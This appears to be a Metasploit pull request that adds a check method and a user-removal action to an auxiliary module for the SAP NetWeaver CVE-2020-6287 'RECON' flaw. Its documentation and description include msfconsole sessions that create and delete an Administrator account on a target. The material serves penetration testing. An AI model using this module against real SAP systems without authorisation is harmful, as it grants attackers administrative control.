### PR TITLE
Improvements for SAP "RECON" CVE-2020-6287 auxiliary module

### DIFF
--- a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md
+++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md
@@ -37,7 +37,7 @@ From the documentation:
 
 ### SAP NetWeaver 7.50
 
-For example, adding a new user `metasploit` with the `Administrator` role:
+Example: Adding a new user `metasploit` with the `Administrator` role:
 
 ```
 msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
@@ -47,17 +47,41 @@ msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
 USERNAME => metasploit
 msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
 PASSWORD => 0pe3nS3sam3
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > check
+[+] 192.168.53.183:50000 - The target is vulnerable.
 msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true
 VERBOSE => true
 msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
 [*] Running module against 192.168.53.183
 
 [*] Starting the PCK Upgrade job...
-[+] Job running with session id: 2c139ded-287f-4c21-a5ef-4c379abcbe22
+[+] Job running with session id: 3e76e705-4bbd-4a6b-b243-154768287fb0
 [*] Received event description: Execution of User Management
 [*] Received event description: Create User PCKUser
+[+] Successfully created the user account
 [*] Received event description: Assign Role SAP_XI_PCK_CONFIG to PCKUser
+[+] Successfully added the role to the new user
 [*] Canceling the PCK Upgrade job...
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) >
+```
+
+Example: Removing the user `metasploit`:
+
+```
+msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan
+RHOSTS => netweaver.lan
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
+USERNAME => metasploit
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
+PASSWORD => 0pe3nS3sam3
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE
+ACTION => REMOVE
+msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
+[*] Running module against 192.168.53.183
+
+[+] Successfully deleted the user account
 [*] Auxiliary module execution completed
 msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) >
 ```

--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
       {
         'uri' => normalize_uri(target_uri.path),
         'method' => 'GET',
-          'vars_get' => { 'wsdl' => '' }
+        'vars_get' => { 'wsdl' => '' }
       }
     )
 
@@ -72,10 +72,10 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     case action.name
-      when 'ADD'
-        action_add
-      when 'REMOVE'
-        action_remove
+    when 'ADD'
+      action_add
+    when 'REMOVE'
+      action_remove
     end
   end
 
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary
         vprint_status("Received event description: #{description}")
       end
 
-      unless (description = event.xpath('//ctc:FinishAction/ctc:Action/ctc:Description/text()')).blank?
+      unless (description = event.xpath('//ctc:FinishAction/ctc:Action/ctc:Description/text()')).blank? # rubocop:disable Style/Next
         if description.to_s =~ /Create User PCKUser/i
           print_good('Successfully created the user account')
         end


### PR DESCRIPTION
This adds 2 major improvements to the auxiliary module (added in PR #13852) that leverages CVE-2020-6287.

The new features include:
* A `check` method, this verifies that the web service is accessible by requesting and analyzing the WSDL file
* A `REMOVE` action, this will remove a user account (so now the module can both add and remove accounts)

Also added, but less important is a handler for `FinishAction` events that will report the status to the user of what's taken place so far since the process can be slow and appear unresponsive.

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/sap/cve_2020_6287`
- [x] Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
- [x] Validate that the `check` command works as expected
- [x] Run the module with the default action to create a new user
    - [x] Validate that the user was created
- [x] Do: `set ACTION REMOVE`
- [x] Run the module and validate that the user is no longer valid

## Example

Example: Removing the user `metasploit`:

```
msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user 
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan
RHOSTS => netweaver.lan
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit
USERNAME => metasploit
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3
PASSWORD => 0pe3nS3sam3
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE
ACTION => REMOVE
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run
[*] Running module against 192.168.53.183

[+] Successfully deleted the user account
[*] Auxiliary module execution completed
msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) >
```